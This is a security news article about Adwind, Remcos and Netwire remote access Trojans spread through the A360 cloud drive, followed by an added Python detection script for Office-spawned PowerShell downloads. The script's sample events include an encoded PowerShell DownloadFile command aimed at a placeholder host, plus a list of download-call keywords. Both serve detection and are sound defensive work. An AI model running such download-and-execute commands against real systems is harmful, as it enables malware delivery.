Wednesday, April 30, 2025

Beware! Dangerous RATs “Adwind, Remcos, Netwire” Delivered via A360 Cloud Drive


The widely used A360 cloud drive platform is being abused to deliver the Adwind, Remcos and Netwire remote access Trojans, with the file-sharing site serving as a malware distribution platform that hosts the malicious files.

Many cloud platforms are now used to deliver malware by hosting malicious files, and they also serve as command-and-control (C&C) infrastructure.

In this case, the command-and-control servers were resolved through free DNS services. Once the malicious RAT file was downloaded and executed, the RATs/backdoors would phone back to their respective command-and-control servers.

“A360 is a cloud-based workspace that centralizes, connects and organizes your team and project information across your desktop, the web, and mobile devices.” A360 Drive provides online storage for collaboration. Anyone can create an account for free and is given 5GB of space.

According to the Trend Micro report, the U.S., South Africa, France, Italy, Germany, Hong Kong, and the U.K. were the most affected by the distributed Adwind, Remcos and Netwire RATs.


How These RATs Abuse the Cloud Infrastructure

These three RATs initially spread via spam email campaigns, with each malware variant having different functions.

The Adwind RAT was initially discovered as a JAR file (JAVA_ADWIND.JEJPDY) that connects to the C&C server when the script is executed. It then retrieves and exfiltrates multifarious data, including credentials, keystrokes, and multimedia files.


The NETWIRE RAT was identified through a spam email campaign with an attached file (JAVA_KRYPTIK.NPP) containing a Java ARchive (JAR) along with an executable script. Further analysis confirmed that it has string references to the NETWIRE remote access tool, which has keylogging and SOCKS proxy capabilities.

Trend Micro discovered a document file named “AMMO REQUEST MOD Turkey.doc” (W2KM_DROPPR.XWD) that contains a generic template for macro malware used to abuse the A360 Drive.

The macro file is an encrypted and obfuscated executable that is finally decrypted. It contains a payload that is a malicious PowerShell script, which downloads a file from A360 Drive and executes it.

The downloaded payload is a Visual Basic obfuscated executable file. Deobfuscating it reveals the Trojanized Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums, Trend Micro said.
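The macro-to-PowerShell-to-cloud-download chain described above can be triaged in process-creation telemetry. The following is an added example, not code from the article or from Trend Micro. The event field names, the placeholder host `a360-drive.example`, the download hints and the sample events are all assumptions constructed for illustration.

```python
import base64
import re

# Assumption: placeholder host; substitute the share-link hosts seen in your proxy logs.
CLOUD_HOSTS = ("a360-drive.example",)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest")
ENC_FLAG = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)  # -e/-enc/-EncodedCommand
URL_HOST = re.compile(r"https?://([^/\s'\"]+)", re.I)

def decode_command(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE), if any."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # bad padding or not UTF-16LE: keep the raw command line
        return cmdline

def reasons(event):
    """Return why a process-creation event matches the macro -> PowerShell chain."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    text = decode_command(event["command_line"]).lower()
    found = []
    if parent in OFFICE_PARENTS:
        found.append("office_parent")
    if any(hint in text for hint in DOWNLOAD_HINTS):
        found.append("download_call")
    hosts = [h.split(":")[0] for h in URL_HOST.findall(text)]
    if any(h == c or h.endswith("." + c) for h in hosts for c in CLOUD_HOSTS):
        found.append("cloud_storage_url")
    return found

# Constructed sample events (not taken from the Trend Micro report).
_cmd = "(New-Object Net.WebClient).DownloadFile('https://a360-drive.example/s/PLACEHOLDER','f')"
_blob = base64.b64encode(_cmd.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLES = [
    {"image": PS, "parent_image": r"C:\Program Files\Office\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc " + _blob},
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Get-ChildItem"},
]

if __name__ == "__main__": print([reasons(ev) for ev in SAMPLES])
```

An Office parent combined with either of the other two reasons is the combination worth alerting on, since a URL on a legitimate file-sharing host rarely stands out by itself.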

Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
